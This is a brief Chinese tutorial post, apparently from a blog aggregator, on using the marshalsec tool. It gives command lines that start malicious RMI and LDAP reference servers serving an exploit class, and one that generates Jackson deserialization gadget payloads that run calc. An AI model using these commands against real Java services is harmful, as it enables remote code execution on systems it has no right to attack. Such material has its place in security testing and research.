zoukankan html css js c++ java

# marshalsec使用

开启rmi服务，恶意类放到服务上

D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启ldap服务

D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

参考链接
列出所有jackson的gadgets传参为calc

D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

Alt text
所有支持的组件

所有支持的gadgets

如果想查找组件可以生成的gadgets有哪些
以Jackson为例

D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

Alt text
如果想查找gadgets可以用于哪些组件生成
1、以resin为例，可以查看手册

2、选择想看的gadgets->find usages

参考链接

查看全文

相关阅读:
qmake杂
 Qt界面风格设置
 qss使用详解
 QT数据库操作
 Qt语言家的简单使用
 c++11之右值引用和std::move
c++11之类型萃取type_traits
c++11之std::bind和function
c++11之lambda
vue中input输入框无法输入